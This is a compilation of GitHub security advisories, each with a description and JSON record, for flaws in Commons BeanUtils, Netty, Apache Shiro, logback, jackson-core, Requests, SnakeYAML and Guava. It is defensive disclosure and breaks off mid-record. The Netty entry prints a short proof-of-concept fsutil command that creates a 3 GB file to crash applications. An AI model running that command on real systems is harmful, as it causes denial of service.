GHSA-WXR5-93PH-8WR9
Vulnerability from github – Published: 2025-05-28 15:34 – Updated: 2025-11-03 21:33Improper Access Control vulnerability in Apache Commons.
A special BeanIntrospector class was added in version 1.9.2. This can be used to stop attackers from using the declared class property of Java enum objects to get access to the classloader. However this protection was not enabled by default. PropertyUtilsBean (and consequently BeanUtilsBean) now disallows declared class level property access by default.
Releases 1.11.0 and 2.0.0-M2 address a potential security issue when accessing enum properties in an uncontrolled way. If an application using Commons BeanUtils passes property paths from an external source directly to the getProperty() method of PropertyUtilsBean, an attacker can access the enum’s class loader via the “declaredClass” property available on all Java “enum” objects. Accessing the enum’s “declaredClass” allows remote attackers to access the ClassLoader and execute arbitrary code. The same issue exists with PropertyUtilsBean.getNestedProperty(). Starting in versions 1.11.0 and 2.0.0-M2 a special BeanIntrospector suppresses the “declaredClass” property. Note that this new BeanIntrospector is enabled by default, but you can disable it to regain the old behavior; see section 2.5 of the user's guide and the unit tests.
This issue affects Apache Commons BeanUtils 1.x before 1.11.0, and 2.x before 2.0.0-M2.Users of the artifact commons-beanutils:commons-beanutils
1.x are recommended to upgrade to version 1.11.0, which fixes the issue.
Users of the artifact org.apache.commons:commons-beanutils2
2.x are recommended to upgrade to version 2.0.0-M2, which fixes the issue.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.10.1"
},
"package": {
"ecosystem": "Maven",
"name": "commons-beanutils:commons-beanutils"
},
"ranges": [
{
"events": [
{
"introduced": "1.0"
},
{
"fixed": "1.11.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.commons:commons-beanutils2"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0-M1"
},
{
"fixed": "2.0.0-M2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-48734"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-28T17:37:18Z",
"nvd_published_at": "2025-05-28T14:15:34Z",
"severity": "HIGH"
},
"details": "Improper Access Control vulnerability in Apache Commons.\n\n\n\nA special BeanIntrospector class was added in version 1.9.2. This can be used to stop attackers from using the declared class property of Java enum objects to get access to the classloader. However this protection was not enabled by default. PropertyUtilsBean (and consequently BeanUtilsBean) now disallows declared class level property access by default.\n\n\n\n\n\nReleases 1.11.0 and 2.0.0-M2 address a potential security issue when accessing enum properties in an uncontrolled way. If an application using Commons BeanUtils passes property paths from an external source directly to the getProperty() method of PropertyUtilsBean, an attacker can access the enum\u2019s class loader via the \u201cdeclaredClass\u201d property available on all Java \u201cenum\u201d objects. Accessing the enum\u2019s \u201cdeclaredClass\u201d allows remote attackers to access the ClassLoader and execute arbitrary code. The same issue exists with PropertyUtilsBean.getNestedProperty().\nStarting in versions 1.11.0 and 2.0.0-M2 a special BeanIntrospector suppresses the \u201cdeclaredClass\u201d property. Note that this new BeanIntrospector is enabled by default, but you can disable it to regain the old behavior; see section 2.5 of the user\u0027s guide and the unit tests.\n\nThis issue affects Apache Commons BeanUtils 1.x before 1.11.0, and 2.x before 2.0.0-M2.Users of the artifact commons-beanutils:commons-beanutils\n\n 1.x are recommended to upgrade to version 1.11.0, which fixes the issue.\n\n\nUsers of the artifact org.apache.commons:commons-beanutils2\n\n 2.x are recommended to upgrade to version 2.0.0-M2, which fixes the issue.",
"id": "GHSA-wxr5-93ph-8wr9",
"modified": "2025-11-03T21:33:58Z",
"published": "2025-05-28T15:34:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48734"
},
{
"type": "WEB",
"url": "https://github.com/apache/commons-beanutils/commit/bd20740da25b69552ddef8523beec0837297eaf9"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/commons-beanutils"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/s0hb3jkfj5f3ryx6c57zqtfohb0of1g9"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/06/msg00027.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/05/28/6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache Commons Improper Access Control vulnerability"
}
GHSA-XQ3W-V528-46RV
Vulnerability from github – Published: 2024-11-12 19:53 – Updated: 2025-02-18 15:57Summary
An unsafe reading of environment file could potentially cause a denial of service in Netty. When loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.
Details
When the library netty is loaded in a java windows application, the library tries to identify the system environnement in which it is executed.
At this stage, Netty tries to load both /etc/os-release and /usr/lib/os-release even though it is in a Windows environment.
If netty finds this files, it reads them and loads them into memory.
By default :
- The JVM maximum memory size is set to 1 GB,
- A non-privileged user can create a directory at
C:\and create files within it.
the source code identified : https://github.com/netty/netty/blob/4.1/common/src/main/java/io/netty/util/internal/PlatformDependent.java
Despite the implementation of the function normalizeOs() the source code not verify the OS before reading C:\etc\os-release and C:\usr\lib\os-release.
PoC
Create a file larger than 1 GB of data in C:\etc\os-release or C:\usr\lib\os-release on a Windows environnement and start your Netty application.
To observe what the application does with the file, the security analyst used "Process Monitor" from the "Windows SysInternals" suite. (https://learn.microsoft.com/en-us/sysinternals/)
cd C:\etc
fsutil file createnew os-release 3000000000
The source code used is the Netty website code example : Echo ‐ the very basic client and server.
The vulnerability was tested on the 4.1.112.Final version.
The security analyst tried the same technique for C:\proc\sys\net\core\somaxconn with a lot of values to impact Netty but the only things that works is the "larger than 1 GB file" technique. https://github.com/netty/netty/blob/c0fdb8e9f8f256990e902fcfffbbe10754d0f3dd/common/src/main/java/io/netty/util/NetUtil.java#L186
Impact
By loading the "file larger than 1 GB" into the memory, the Netty library exceeds the JVM memory limit and causes a crash in the java Windows application.
This behaviour occurs 100% of the time in both Server mode and Client mode if the large file exists.
Client mode :
Server mode :
somaxconn :
Severity
- Attack vector : "Local" because the attacker needs to be on the system where the Netty application is running.
- Attack complexity : "Low" because the attacker only need to create a massive file (regardless of its contents).
- Privileges required : "Low" because the attacker requires a user account to exploit the vulnerability.
- User intercation : "None" because the administrator don't need to accidentally click anywhere to trigger the vulnerability. Furthermore, the exploitation works with defaults windows/AD settings.
- Scope : "Unchanged" because only Netty is affected by the vulnerability.
- Confidentiality : "None" because no data is exposed through exploiting the vulnerability.
- Integrity : "None" because the explotation of the vulnerability does not allow editing, deleting or adding data elsewhere.
- Availability : "High" because the exploitation of this vulnerability crashes the entire java application.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.114.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-common"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.115.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-47535"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-12T19:53:17Z",
"nvd_published_at": "2024-11-12T16:15:22Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nAn unsafe reading of environment file could potentially cause a denial of service in Netty.\nWhen loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.\n\n\n### Details\n\nWhen the library netty is loaded in a java windows application, the library tries to identify the system environnement in which it is executed.\n\nAt this stage, Netty tries to load both `/etc/os-release` and `/usr/lib/os-release` even though it is in a Windows environment. \n\n\u003cimg width=\"364\" alt=\"1\" src=\"https://github.com/user-attachments/assets/9466b181-9394-45a3-b0e3-1dcf105def59\"\u003e\n\nIf netty finds this files, it reads them and loads them into memory.\n\nBy default :\n\n- The JVM maximum memory size is set to 1 GB,\n- A non-privileged user can create a directory at `C:\\` and create files within it.\n\n\u003cimg width=\"340\" alt=\"2\" src=\"https://github.com/user-attachments/assets/43b359a2-5871-4592-ae2b-ffc40ac76831\"\u003e\n\n\u003cimg width=\"523\" alt=\"3\" src=\"https://github.com/user-attachments/assets/ad5c6eed-451c-4513-92d5-ba0eee7715c1\"\u003e\n\nthe source code identified :\nhttps://github.com/netty/netty/blob/4.1/common/src/main/java/io/netty/util/internal/PlatformDependent.java\n\nDespite the implementation of the function `normalizeOs()` the source code not verify the OS before reading `C:\\etc\\os-release` and `C:\\usr\\lib\\os-release`.\n\n### PoC\n\nCreate a file larger than 1 GB of data in `C:\\etc\\os-release` or `C:\\usr\\lib\\os-release` on a Windows environnement and start your Netty application.\n\nTo observe what the application does with the file, the security analyst used \"Process Monitor\" from the \"Windows SysInternals\" suite. (https://learn.microsoft.com/en-us/sysinternals/)\n\n```\ncd C:\\etc\nfsutil file createnew os-release 3000000000\n```\n\n\u003cimg width=\"519\" alt=\"4\" src=\"https://github.com/user-attachments/assets/39df22a3-462b-4fd0-af9a-aa30077ec08f\"\u003e\n\n\u003cimg width=\"517\" alt=\"5\" src=\"https://github.com/user-attachments/assets/129dbd50-fc36-4da5-8eb1-582123fb528f\"\u003e\n\nThe source code used is the Netty website code example : [Echo \u2010 the very basic client and server](https://netty.io/4.1/xref/io/netty/example/echo/package-summary.html).\n\nThe vulnerability was tested on the 4.1.112.Final version.\n\nThe security analyst tried the same technique for `C:\\proc\\sys\\net\\core\\somaxconn` with a lot of values to impact Netty but the only things that works is the \"larger than 1 GB file\" technique. https://github.com/netty/netty/blob/c0fdb8e9f8f256990e902fcfffbbe10754d0f3dd/common/src/main/java/io/netty/util/NetUtil.java#L186\n\n### Impact\n\nBy loading the \"file larger than 1 GB\" into the memory, the Netty library exceeds the JVM memory limit and causes a crash in the java Windows application.\n\nThis behaviour occurs 100% of the time in both Server mode and Client mode if the large file exists.\n\nClient mode :\n\n\u003cimg width=\"449\" alt=\"6\" src=\"https://github.com/user-attachments/assets/f8fe1ed0-1a42-4490-b9ed-dbc9af7804be\"\u003e\n\nServer mode :\n\n\u003cimg width=\"464\" alt=\"7\" src=\"https://github.com/user-attachments/assets/b34b42bd-4fbd-4170-b93a-d29ba87b88eb\"\u003e\n\nsomaxconn :\n\n\u003cimg width=\"532\" alt=\"8\" src=\"https://github.com/user-attachments/assets/0656b3bb-32c6-4ae2-bff7-d93babba08a3\"\u003e\n\n### Severity\n\n- Attack vector : \"Local\" because the attacker needs to be on the system where the Netty application is running.\n- Attack complexity : \"Low\" because the attacker only need to create a massive file (regardless of its contents).\n- Privileges required : \"Low\" because the attacker requires a user account to exploit the vulnerability.\n- User intercation : \"None\" because the administrator don\u0027t need to accidentally click anywhere to trigger the vulnerability. Furthermore, the exploitation works with defaults windows/AD settings.\n- Scope : \"Unchanged\" because only Netty is affected by the vulnerability.\n- Confidentiality : \"None\" because no data is exposed through exploiting the vulnerability.\n- Integrity : \"None\" because the explotation of the vulnerability does not allow editing, deleting or adding data elsewhere.\n- Availability : \"High\" because the exploitation of this vulnerability crashes the entire java application.",
"id": "GHSA-xq3w-v528-46rv",
"modified": "2025-02-18T15:57:45Z",
"published": "2024-11-12T19:53:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47535"
},
{
"type": "WEB",
"url": "https://github.com/netty/netty/commit/fbf7a704a82e7449b48bd0bbb679f5661c6d61a3"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Denial of Service attack on windows app using netty"
}
GHSA-JC7H-C423-MPJC
Vulnerability from github – Published: 2024-01-15 12:30 – Updated: 2025-11-04 16:49Apache Shiro before 1.130 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting
Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure blockSemicolon is enabled (this is the default).
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.shiro:shiro-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.13.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c 2.0.0alpha4"
},
"package": {
"ecosystem": "Maven",
"name": "org.apache.shiro:shiro-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0alpha1"
},
{
"fixed": "2.0.0-alpha4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-46749"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-16T20:34:50Z",
"nvd_published_at": "2024-01-15T10:15:26Z",
"severity": "MODERATE"
},
"details": "Apache Shiro before 1.130 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting \n\nMitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).",
"id": "GHSA-jc7h-c423-mpjc",
"modified": "2025-11-04T16:49:23Z",
"published": "2024-01-15T12:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46749"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/mdv7ftz7k4488rzloxo2fb0p9shnp9wm"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20241108-0002"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache Shiro vulnerable to path traversal"
}
GHSA-6V67-2WR5-GVF4
Vulnerability from github – Published: 2024-12-19 18:31 – Updated: 2025-01-03 19:06Server-Side Request Forgery (SSRF) in SaxEventRecorder by QOS.CH logback version 1.5.12 on the Java platform, allows an attacker to forge requests by compromising logback configuration files in XML.
The attacks involves the modification of DOCTYPE declaration in XML configuration files.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "ch.qos.logback:logback-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.5.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "ch.qos.logback:logback-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.15"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-12801"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-19T22:22:44Z",
"nvd_published_at": "2024-12-19T17:15:08Z",
"severity": "LOW"
},
"details": "Server-Side Request Forgery (SSRF) in SaxEventRecorder by QOS.CH logback version 1.5.12 on the Java platform, allows an attacker to forge requests by compromising logback configuration files in XML.\n \nThe attacks involves the modification of DOCTYPE declaration in\u00a0 XML configuration files.",
"id": "GHSA-6v67-2wr5-gvf4",
"modified": "2025-01-03T19:06:48Z",
"published": "2024-12-19T18:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12801"
},
{
"type": "WEB",
"url": "https://github.com/qos-ch/logback/commit/5f05041cba4c4ac0a62748c5c527a2da48999f2d"
},
{
"type": "PACKAGE",
"url": "https://github.com/qos-ch/logback"
},
{
"type": "WEB",
"url": "https://logback.qos.ch/news.html#1.3.15"
},
{
"type": "WEB",
"url": "https://logback.qos.ch/news.html#1.5.13"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:L/VI:N/VA:L/SC:H/SI:H/SA:H/V:D/U:Clear",
"type": "CVSS_V4"
}
],
"summary": "QOS.CH logback-core Server-Side Request Forgery vulnerability"
}
GHSA-H46C-H94J-95F3
Vulnerability from github – Published: 2025-06-27 15:22 – Updated: 2025-06-27 15:22Impact
With older versions of jackson-core, if you parse an input file and it has deeply nested data, Jackson could end up throwing a StackoverflowError if the depth is particularly large.
Patches
jackson-core 2.15.0 contains a configurable limit for how deep Jackson will traverse in an input document, defaulting to an allowable depth of 1000. Change is in https://github.com/FasterXML/jackson-core/pull/943. jackson-core will throw a StreamConstraintsException if the limit is reached. jackson-databind also benefits from this change because it uses jackson-core to parse JSON inputs.
Workarounds
Users should avoid parsing input files from untrusted sources.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.fasterxml.jackson.core:jackson-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.15.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-52999"
],
"database_specific": {
"cwe_ids": [
"CWE-121"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-27T15:22:22Z",
"nvd_published_at": "2025-06-25T17:15:39Z",
"severity": "HIGH"
},
"details": "### Impact\nWith older versions of jackson-core, if you parse an input file and it has deeply nested data, Jackson could end up throwing a StackoverflowError if the depth is particularly large.\n\n### Patches\njackson-core 2.15.0 contains a configurable limit for how deep Jackson will traverse in an input document, defaulting to an allowable depth of 1000. Change is in https://github.com/FasterXML/jackson-core/pull/943. jackson-core will throw a StreamConstraintsException if the limit is reached.\njackson-databind also benefits from this change because it uses jackson-core to parse JSON inputs.\n\n### Workarounds\nUsers should avoid parsing input files from untrusted sources.",
"id": "GHSA-h46c-h94j-95f3",
"modified": "2025-06-27T15:22:22Z",
"published": "2025-06-27T15:22:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-h46c-h94j-95f3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52999"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-core/pull/943"
},
{
"type": "PACKAGE",
"url": "https://github.com/FasterXML/jackson-core"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "jackson-core can throw a StackoverflowError when processing deeply nested data"
}
GHSA-389X-839F-4RHX
Vulnerability from github – Published: 2025-02-10 18:14 – Updated: 2025-03-19 14:51Summary
An unsafe reading of environment file could potentially cause a denial of service in Netty. When loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.
Details
A similar issue was previously reported in https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv This issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit.
PoC
The PoC is the same as for https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv with the detail that the file should only contain null-bytes; 0x00.
When the null-bytes are encountered by the InputStreamReader, it will issue replacement characters in its charset decoding, which will fill up the line-buffer in the BufferedReader.readLine(), because the replacement character is not a line-break character.
Impact
Impact is the same as https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-common"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.118.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-25193"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-10T18:14:47Z",
"nvd_published_at": "2025-02-10T22:15:38Z",
"severity": "MODERATE"
},
"details": "### Summary\nAn unsafe reading of environment file could potentially cause a denial of service in Netty.\nWhen loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.\n\n### Details\nA similar issue was previously reported in https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv\nThis issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit.\n\n\n### PoC\nThe PoC is the same as for https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv with the detail that the file should only contain null-bytes; 0x00.\nWhen the null-bytes are encountered by the `InputStreamReader`, it will issue replacement characters in its charset decoding, which will fill up the line-buffer in the `BufferedReader.readLine()`, because the replacement character is not a line-break character.\n\n### Impact\nImpact is the same as https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv",
"id": "GHSA-389x-839f-4rhx",
"modified": "2025-03-19T14:51:27Z",
"published": "2025-02-10T18:14:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-389x-839f-4rhx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25193"
},
{
"type": "WEB",
"url": "https://github.com/netty/netty/commit/d1fbda62d3a47835d3fb35db8bd42ecc205a5386"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250221-0006"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Denial of Service attack on windows app using Netty"
}
GHSA-GC5V-M9X4-R6X2
Vulnerability from github – Published: 2026-03-25 16:56 – Updated: 2026-03-27 22:07Impact
The requests.utils.extract_zipped_paths() utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one.
Affected usages
Standard usage of the Requests library is not affected by this vulnerability. Only applications that call extract_zipped_paths() directly are impacted.
Remediation
Upgrade to at least Requests 2.33.0, where the library now extracts files to a non-deterministic location.
If developers are unable to upgrade, they can set TMPDIR in their environment to a directory with restricted write access.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "requests"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.33.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25645"
],
"database_specific": {
"cwe_ids": [
"CWE-377"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-25T16:56:28Z",
"nvd_published_at": "2026-03-25T17:16:52Z",
"severity": "MODERATE"
},
"details": "### Impact\nThe `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one.\n\n### Affected usages\n**Standard usage of the Requests library is not affected by this vulnerability.** Only applications that call `extract_zipped_paths()` directly are impacted.\n\n### Remediation\nUpgrade to at least Requests 2.33.0, where the library now extracts files to a non-deterministic location.\n\nIf developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.",
"id": "GHSA-gc5v-m9x4-r6x2",
"modified": "2026-03-27T22:07:42Z",
"published": "2026-03-25T16:56:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25645"
},
{
"type": "WEB",
"url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"
},
{
"type": "PACKAGE",
"url": "https://github.com/psf/requests"
},
{
"type": "WEB",
"url": "https://github.com/psf/requests/releases/tag/v2.33.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Requests has Insecure Temp File Reuse in its extract_zipped_paths() utility function"
}
GHSA-W37G-RHQ8-7M4J
Vulnerability from github – Published: 2022-11-11 19:00 – Updated: 2024-06-21 21:33Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.yaml:snakeyaml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.32"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-41854"
],
"database_specific": {
"cwe_ids": [
"CWE-121",
"CWE-787"
],
"github_reviewed": true,
"github_reviewed_at": "2022-11-21T22:27:27Z",
"nvd_published_at": "2022-11-11T13:15:00Z",
"severity": "MODERATE"
},
"details": "Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack.",
"id": "GHSA-w37g-rhq8-7m4j",
"modified": "2024-06-21T21:33:52Z",
"published": "2022-11-11T19:00:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41854"
},
{
"type": "PACKAGE",
"url": "https://bitbucket.org/snakeyaml/snakeyaml"
},
{
"type": "WEB",
"url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/e230a1758842beec93d28eddfde568c21774780a"
},
{
"type": "WEB",
"url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/531"
},
{
"type": "WEB",
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50355"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240315-0009"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240621-0006"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Snakeyaml vulnerable to Stack overflow leading to denial of service"
}
GHSA-5MG8-W23W-74H3
Vulnerability from github – Published: 2021-03-25 17:04 – Updated: 2026-02-23 22:45A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava com.google.common.io.Files.createTempDir(). The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.google.guava:guava"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "32.0.0-android"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-8908"
],
"database_specific": {
"cwe_ids": [
"CWE-173",
"CWE-200",
"CWE-378",
"CWE-732"
],
"github_reviewed": true,
"github_reviewed_at": "2021-03-25T17:01:09Z",
"nvd_published_at": "2020-12-10T23:15:00Z",
"severity": "LOW"
},
"details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.",
"id": "GHSA-5mg8-w23w-74h3",
"modified": "2026-02-23T22:45:53Z",
"published": "2021-03-25T17:04:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8908"
},
{
"type": "WEB",
"url": "https://github.com/google/guava/issues/4011"
},
{
"type": "WEB",
"url": "https://github.com/google/guava/issues/4011#issuecomment-1578991974"
},
{
"type": "WEB",
"url": "https://github.com/google/guava/commit/feb83a1c8fd2e7670b244d5afd23cba5aca43284"
},
{
"type": "WEB",
"url": "https://github.com/google/guava/commit/fec0dbc4634006a6162cfd4d0d09c962073ddf40"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E"
},
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"type": "WEB",
"url": "https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604%40%3Ctorque-dev.db.apache.org%3E"
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},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"type": "WEB",
